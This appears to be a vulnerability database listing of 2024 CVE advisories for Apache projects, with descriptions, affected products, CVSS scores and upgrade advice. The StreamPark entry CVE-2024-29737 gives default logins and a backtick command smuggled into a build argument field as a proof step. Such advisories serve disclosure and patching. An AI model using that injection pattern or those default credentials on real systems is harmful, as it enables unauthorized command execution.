Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access.  Users of Apache Airflow are recommended to upgrade to version 2.8.3 or newer to mitigate the risk associated with this vulnerability

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-28752

An SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF-style attacks on web services that take at least one parameter of any type. Users of other data bindings (including the default data binding) are not impacted.

Products Affected

Vendor Product Version
apache cxf *
netapp ontap_tools 10
netapp oncommand_workflow_automation -
CVE-2024-29006

By default the CloudStack management server honours the x-forwarded-for HTTP header and logs it as the source IP of an API request. This could lead to authentication bypass and other operational problems should an attacker decide to spoof their IP address this way. Users are recommended to upgrade to CloudStack version 4.18.1.1 or 4.19.0.1, which fixes this issue.

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.19.0.0
CVE-2024-29007

The CloudStack management server and secondary storage VM could be tricked into making requests to restricted or random resources by means of following 301 HTTP redirects presented by external servers when downloading templates or ISOs. Users are recommended to upgrade to version 4.18.1.1 or 4.19.0.1, which fixes this issue.

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.19.0.0
CVE-2024-29008

A problem has been identified in the CloudStack additional VM configuration (extraconfig) feature which can be misused by anyone who has privilege to deploy a VM instance or configure settings of an already deployed VM instance, to configure additional VM configuration even when the feature is not explicitly enabled by the administrator. In a KVM based CloudStack environment, an attacker can exploit this issue to attach host devices such as storage disks, and PCI and USB devices such as network adapters and GPUs, in a regular VM instance that can be further exploited to gain access to the underlying network and storage infrastructure resources, and access any VM instance disks on the local storage. Users are advised to upgrade to version 4.18.1.1 or 4.19.0.1, which fixes this issue.

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.19.0.0
CVE-2024-29070

On versions before 2.1.4, the session is not invalidated after logout. When the user logged in successfully, the backend service returned "Authorization" as the front-end authentication credential. "Authorization" can still initiate requests and access data even after logout. Mitigation: all users should upgrade to 2.1.4.

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29120

In StreamPark (version < 2.1.4), when a user logged in successfully, the backend service would return "Authorization" as the front-end authentication credential. A user can use this credential to request other users' information, including the administrator's username, password, salt value, etc. Mitigation: all users should upgrade to 2.1.4.

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29131

Out-of-bounds Write vulnerability in Apache Commons Configuration. This issue affects Apache Commons Configuration: from 2.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_configuration *
netapp snapcenter -
fedoraproject fedora 39
netapp ontap_tools 10
fedoraproject fedora 40
CVE-2024-29133

Out-of-bounds Write vulnerability in Apache Commons Configuration. This issue affects Apache Commons Configuration: from 2.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_configuration *
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-29178

On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server. The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability. Mitigation: all users should upgrade to 2.1.4.

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29217

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer. This issue affects Apache Answer: before 1.3.0. XSS attack when a user changes their personal website: a logged-in user, when modifying their personal website, can input malicious code in the website field to create such an attack. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-29733

Improper Certificate Validation vulnerability in Apache Airflow FTP Provider. The FTP hook lacks complete certificate validation in FTP_TLS connections, which can potentially be leveraged. Implementing proper certificate validation by passing context=ssl.create_default_context() during FTP_TLS instantiation is used as mitigation to validate the certificates properly. This issue affects Apache Airflow FTP Provider: before 3.7.0. Users are recommended to upgrade to version 3.7.0, which fixes the issue.

Products Affected

Vendor Product Version
apache apache-airflow-providers-ftp *
CVE-2024-29735

Improper Preservation of Permissions vulnerability in Apache Airflow. This issue affects Apache Airflow from 2.8.2 through 2.8.3. Airflow's local file task handler incorrectly set permissions for all parent folders of the log folder, in the default configuration adding write access for the Unix group of the folders. In the case Airflow is run as the root user (not recommended) it added group write permission to all folders up to the root of the filesystem. If your log files are stored in the home directory, these permission changes might impact your ability to run SSH operations after your home directory becomes group-writeable. This issue does not affect users who use or extend Airflow using the official Airflow Docker reference images ( https://hub.docker.com/r/apache/airflow/ ), since those images require group write permission to be set anyway. You are affected only if you install Airflow using a local installation / virtualenv or other Docker images, but the issue has no impact if Docker containers are used as intended, i.e. where Airflow components do not share containers with other applications and users. You should also not be affected if your umask is 002 (group write enabled), which is the default on many Linux systems. Recommendations for users running Airflow outside of containers:
* if you are using root to run Airflow, change your Airflow user to a non-root user
* upgrade Apache Airflow to 2.8.4 or above
* if you prefer not to upgrade, you can change the https://airflow.apache.org/docs/apache-airflow/stable/configurations-ref.html#file-task-handler-new-folder-permissions setting to 0o755 (original value 0o775)
* if you already ran Airflow tasks before and your default umask is 022 (group write disabled), you should stop Airflow components, check the permissions of AIRFLOW_HOME/logs in all your components and all parent directories of this directory, and remove group write access for all the parent directories

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-29736

An SSRF vulnerability in the WADL service description in versions of Apache CXF before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform SSRF-style attacks on REST web services. The attack only applies if a custom stylesheet parameter is configured.

Products Affected

Vendor Product Version
apache cxf *
CVE-2024-29737

In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4. Background info: Log in to StreamPark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injected command is executed after running the build. In the latest version, the special symbol ` is intercepted.

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29834

This vulnerability allows authenticated users with produce or consume permissions to perform unauthorized operations on partitioned topics, such as unloading topics and triggering compaction. These management operations should be restricted to users with the tenant admin role or superuser role. An authenticated user with produce permission can create subscriptions and update subscription properties on partitioned topics, even though this should be limited to users with consume permissions. This impact analysis assumes that Pulsar has been configured with the default authorization provider. For custom authorization providers, the impact could be slightly different. Additionally, the vulnerability allows an authenticated user to read, create, modify, and delete namespace properties in any namespace in any tenant. In Pulsar, namespace properties are reserved for user provided metadata about the namespace. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.6, from 2.11.0 to 2.11.4, from 3.0.0 to 3.0.3, from 3.1.0 to 3.1.3, and from 3.2.0 to 3.2.1. 3.0 Apache Pulsar users should upgrade to at least 3.0.4. 3.1 and 3.2 Apache Pulsar users should upgrade to at least 3.2.2. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 3.1 2.7

Products Affected

Vendor Product Version
apache pulsar *
CVE-2024-29868

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism. This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account. This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-29869

Hive creates a credentials file to a temporary directory in the file system with permissions 644 by default when the file permissions are not set explicitly. Any unauthorized user having access to the directory can read the sensitive information written into this file. Users are recommended to upgrade to version 4.0.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

Products Affected

Vendor Product Version
apache hive *
CVE-2024-30188

File read and write vulnerability in Apache DolphinScheduler: authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler: from 3.1.0 before 3.2.2. Users are recommended to upgrade to version 3.2.2, which fixes the issue.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2024-30471

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration. This allows an attacker to potentially request the creation of multiple accounts with the same email address until the email address is registered, creating many identical users and corrupting StreamPipes' user management. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-31141

Files or Directories Accessible to External Parties, Improper Privilege Management vulnerability in Apache Kafka Clients. Apache Kafka Clients accept configuration data for customizing behavior, and includes ConfigProvider plugins in order to manipulate these configurations. Apache Kafka also provides FileConfigProvider, DirectoryConfigProvider, and EnvVarConfigProvider implementations which include the ability to read from disk or environment variables. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use these ConfigProviders to read arbitrary contents of the disk and environment variables. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment access, which may be undesirable in certain environments, including SaaS products. This issue affects Apache Kafka Clients: from 2.3.0 through 3.5.2, 3.6.2, 3.7.0. Users with affected applications are recommended to upgrade kafka-clients to version >=3.8.0, and set the JVM system property "org.apache.kafka.automatic.config.providers=none". Users of Kafka Connect with one of the listed ConfigProvider implementations specified in their worker config are also recommended to add appropriate "allowlist.pattern" and "allowed.paths" to restrict their operation to appropriate bounds. For users of Kafka Clients or Kafka Connect in environments that trust users with disk and environment variable access, it is not recommended to set the system property. For users of the Kafka Broker, Kafka MirrorMaker 2.0, Kafka Streams, and Kafka command-line tools, it is not recommended to set the system property.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache kafka *
apache kafka 3.7.0
CVE-2024-31309

HTTP/2 CONTINUATION DoS attack can cause Apache Traffic Server to consume more resources on the server. Versions from 8.0.0 through 8.1.9 and from 9.0.0 through 9.2.3 are affected. Users can set a new setting (proxy.config.http2.max_continuation_frames_per_minute) to limit the number of CONTINUATION frames per minute. ATS does have a fixed amount of memory a request can use, and ATS adheres to these limits in previous releases. Users are recommended to upgrade to versions 8.1.10 or 9.2.4, which fix the issue.

Products Affected

Vendor Product Version
fedoraproject fedora 38
debian debian_linux 10.0
apache traffic_server *
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-31391

Insertion of Sensitive Information into Log File vulnerability in the Apache Solr Operator. This issue affects all versions of the Apache Solr Operator from 0.3.0 through 0.8.0. When asked to bootstrap Solr security, the operator will enable basic authentication and create several accounts for accessing Solr: including the "solr" and "admin" accounts for use by end-users, and a "k8s-oper" account which the operator uses for its own requests to Solr. One common source of these operator requests is healthchecks: liveness, readiness, and startup probes are all used to determine Solr's health and ability to receive traffic. By default, the operator configures the Solr APIs used for these probes to be exempt from authentication, but users may specifically request that authentication be required on probe endpoints as well. Whenever one of these probes would fail, if authentication was in use, the Solr Operator would create a Kubernetes "event" containing the username and password of the "k8s-oper" account. Within the affected version range, this vulnerability affects any solrcloud resource which (1) bootstrapped security through use of the `.solrOptions.security.authenticationType=basic` option, and (2) required authentication be used on probes by setting `.solrOptions.security.probesRequireAuth=true`. Users are recommended to upgrade to Solr Operator version 0.8.1, which fixes this issue by ensuring that probes no longer print the credentials used for Solr requests.  Users may also mitigate the vulnerability by disabling authentication on their healthcheck probes using the setting `.solrOptions.security.probesRequireAuth=false`.

Products Affected

Vendor Product Version
apache solr_operator *
CVE-2024-31411

Unrestricted Upload of File with dangerous type vulnerability in Apache StreamPipes. Such a dangerous type might be an executable file that may lead to a remote code execution (RCE). The unrestricted upload is only possible for authenticated and authorized users. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-31860

Improper Input Validation vulnerability in Apache Zeppelin. By adding relative path indicators (e.g. ..), attackers can see the contents of any files in the filesystem that the server account can access. This issue affects Apache Zeppelin: from 0.9.0 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31862

Improper Input Validation vulnerability in Apache Zeppelin when creating a new note from Zeppelin's UI. This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31863

Authentication Bypass by Spoofing vulnerability by replacing existing notes in Apache Zeppelin. This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin 0.10.1
CVE-2024-31864

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin. The attacker can inject sensitive configuration or malicious code when connecting MySQL database via JDBC driver. This issue affects Apache Zeppelin: before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31865

Improper Input Validation vulnerability in Apache Zeppelin. Attackers can call the cron update API with invalid or improper privileges so that the notebook runs with those privileges. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31866

Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin. The attackers can execute shell scripts or malicious code by overriding configuration like ZEPPELIN_INTP_CLASSPATH_OVERRIDES. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31867

Improper Input Validation vulnerability in Apache Zeppelin. The attackers can execute malicious queries by setting improper configuration properties to LDAP search filter. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31868

Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin. Attackers can modify helium.json and expose normal users to XSS attacks. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31979

Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements. Previously, StreamPipes allowed users to configure custom endpoints from which to install additional pipeline elements. These endpoints were not properly validated, allowing an attacker to get StreamPipes to send an HTTP GET request to an arbitrary address. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-32007

An improper input validation of the p2c parameter in the Apache CXF JOSE code before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform a denial of service attack by specifying a large value for this parameter in a token. 

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache cxf *
CVE-2024-32077

Apache Airflow version 2.9.0 has a vulnerability that allows an authenticated attacker to inject malicious data into the task instance logs.  Users are recommended to upgrade to version 2.9.1, which fixes this issue.

Products Affected

Vendor Product Version
apache airflow 2.9.0
CVE-2024-32113

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.13. Users are recommended to upgrade to version 18.12.13, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-32114

In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using the Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST API). To mitigate, users can update the default conf/jetty.xml configuration file to add an authentication requirement:

    <bean id="securityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping">
        <property name="constraint" ref="securityConstraint" />
        <property name="pathSpec" value="/" />
    </bean>

Or we encourage users to upgrade to Apache ActiveMQ 6.1.2, where the default configuration has been updated with authentication by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:H 2.1 5.8

Products Affected

Vendor Product Version
apache activemq *
CVE-2024-32638

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in Apache APISIX when using the `forward-auth` plugin. This issue affects Apache APISIX: 3.8.0 and 3.9.0. Users are recommended to upgrade to version 3.8.1, 3.9.1 or higher, which fixes the issue.

Products Affected

Vendor Product Version
apache apisix 3.9.0
apache apisix 3.8.0
CVE-2024-32838

SQL Injection vulnerability in various API endpoints (offices, dashboards, etc.). Apache Fineract versions 1.9 and before have a vulnerability that allows an authenticated attacker to inject malicious data into the query parameters of some of the REST API endpoints. Users are recommended to upgrade to version 1.10.1, which fixes this issue. A SQL Validator has been implemented which allows us to configure a series of tests and checks against our SQL queries that will allow us to validate and protect against nearly all potential SQL injection attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-34365

** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Karaf Cave. This issue affects all versions of Apache Karaf Cave. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache karaf_cave *
CVE-2024-34457

In Apache StreamPark versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view every user's Flink information, including executeSQL and config. Mitigation: all users should upgrade to 2.1.4.

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-34693

Improper Input Validation vulnerability in Apache Superset allows an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow local infile, it is possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content into a MariaDB database table. This issue affects Apache Superset: before 3.1.3 and version 4.0.0. Users are recommended to upgrade to version 4.0.1 or 3.1.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 2.3 4.0

Products Affected

Vendor Product Version
apache superset *
CVE-2024-34750

Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams, which in turn led to the use of an incorrect infinite timeout, which allowed connections to remain open that should have been closed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.0-M1 through 9.0.89. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M21, 10.1.25 or 9.0.90, which fixes the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
netapp ontap_tools 9
CVE-2024-35161

Apache Traffic Server forwards a malformed HTTP chunked trailer section to origin servers. This can be utilized for request smuggling and may also lead to cache poisoning if the origin servers are vulnerable. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4. Users can set a new setting (proxy.config.http.drop_chunked_trailers) so that the chunked trailer section is not forwarded. Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-35164

The terminal emulator of Apache Guacamole 1.5.5 and older does not properly validate console codes received from servers via text-based protocols like SSH. If a malicious user has access to a text-based connection, a specially-crafted sequence of console codes could allow arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache guacamole *
CVE-2024-35296

Invalid Accept-Encoding header can cause Apache Traffic Server to fail cache lookup and force forwarding requests. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4. Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-36104

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14. Users are recommended to upgrade to version 18.12.14, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-36263

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Submarine Server Core. This issue affects Apache Submarine Server Core: all versions. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache submarine *
CVE-2024-36264

** UNSUPPORTED WHEN ASSIGNED ** Improper Authentication vulnerability in Apache Submarine Commons Utils. If the user doesn't explicitly set `submarine.auth.default.secret`, a default value will be used. This issue affects Apache Submarine Commons Utils: from 0.8.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache submarine *
CVE-2024-36265

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Submarine Server Core. This issue affects Apache Submarine Server Core: from 0.8.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache submarine *
CVE-2024-36268

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong. This issue affects Apache InLong: from 1.10.0 through 1.12.0, and could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong 1.13.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/10251

Products Affected

Vendor Product Version
apache inlong *
CVE-2024-36387

Serving WebSocket protocol upgrades over an HTTP/2 connection could result in a Null Pointer dereference, leading to a crash of the server process, degrading performance.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-36448

** UNSUPPORTED WHEN ASSIGNED ** Server-Side Request Forgery (SSRF) vulnerability in Apache IoTDB Workbench. This issue affects Apache IoTDB Workbench: from 0.13.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache iotdb_workbench *
CVE-2024-36471

Import functionality is vulnerable to DNS rebinding attacks between verification and processing of the URL.  Project administrators can run these imports, which could cause Allura to read from internal services and expose them. This issue affects Apache Allura from 1.0.1 through 1.16.0. Users are recommended to upgrade to version 1.17.0, which fixes the issue. If you are unable to upgrade, set "disable_entry_points.allura.importers = forge-tracker, forge-discussion" in your .ini config file.

Products Affected

Vendor Product Version
apache allura *
CVE-2024-36522

The default configuration of XSLTResourceStream.java in Apache Wicket is vulnerable to remote code execution via XSLT injection when processing input from an untrusted source without validation. Users are recommended to upgrade to versions 10.1.0, 9.18.0 or 8.16.0, which fix this issue.

Products Affected

Vendor Product Version
apache wicket 10.0.0
apache wicket *
CVE-2024-37358

Similarly to CVE-2024-34055, Apache James is vulnerable to denial of service through the abuse of IMAP literals from both authenticated and unauthenticated users, which could be used to cause unbounded memory allocation and very long computations. Versions 3.7.6 and 3.8.2 restrict such illegitimate use of IMAP literals.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H 3.9 4.0

Products Affected

Vendor Product Version
apache james_server *
CVE-2024-37389

Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache nifi 2.0.0
apache nifi *
CVE-2024-38286

Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.13 through 9.0.89. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.35 through 8.5.100 and 7.0.92 through 7.0.109. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M21, 10.1.25, or 9.0.90, which fixes the issue. Apache Tomcat, under certain configurations on any platform, allows an attacker to cause an OutOfMemoryError by abusing the TLS handshake process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H 3.9 4.0

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
netapp ontap_tools 10
netapp ontap_tools 9
CVE-2024-38311

Improper Input Validation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.11, from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-38346

The CloudStack cluster service runs on unauthenticated port (default 9090) that can be misused to run arbitrary commands on targeted hypervisors and CloudStack management server hosts. Some of these commands were found to have command injection vulnerabilities that can result in arbitrary code execution via agents on the hosts that may run as a privileged user. An attacker that can reach the cluster service on the unauthenticated port (default 9090), can exploit this to perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure. Users are recommended to restrict the network access to the cluster service port (default 9090) on a CloudStack management server host to only its peer CloudStack management server hosts. Users are recommended to upgrade to version 4.18.2.1, 4.19.0.2 or later, which addresses this issue.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-38379

Apache Allura's neighborhood settings are vulnerable to a stored XSS attack.  Only neighborhood admins can access these settings, so the scope of risk is limited to configurations where neighborhood admins are not fully trusted. This issue affects Apache Allura: from 1.4.0 through 1.17.0. Users are recommended to upgrade to version 1.17.1, which fixes the issue.

Products Affected

Vendor Product Version
apache allura *
CVE-2024-38472

SSRF in Apache HTTP Server on Windows allows NTLM hashes to potentially be leaked to a malicious server via SSRF and malicious requests or content. Users are recommended to upgrade to version 2.4.60, which fixes this issue. Note: Existing configurations that access UNC paths will have to configure the new directive "UNCList" to allow access during request processing.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-38473

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-38474

Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to execute scripts in directories permitted by the configuration but not directly reachable by any URL, or to disclose the source of scripts meant only to be executed as CGI. Users are recommended to upgrade to version 2.4.60, which fixes this issue. Some RewriteRules that capture and substitute unsafely will now fail unless the rewrite flag "UnsafeAllow3F" is specified.

Products Affected

Vendor Product Version
apache http_server *
netapp clustered_data_ontap 9.0
CVE-2024-38475

Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use backreferences or variables as the first segment of the substitution are affected. Some unsafe RewriteRules will be broken by this change, and the rewrite flag "UnsafePrefixStat" can be used to opt back in once it has been ensured that the substitution is appropriately constrained.

Products Affected

Vendor Product Version
apache http_server *
sonicwall sma_210_firmware *
sonicwall sma_200_firmware *
sonicwall sma_500v_firmware *
sonicwall sma_410_firmware *
netapp ontap_9 -
sonicwall sma_400_firmware *
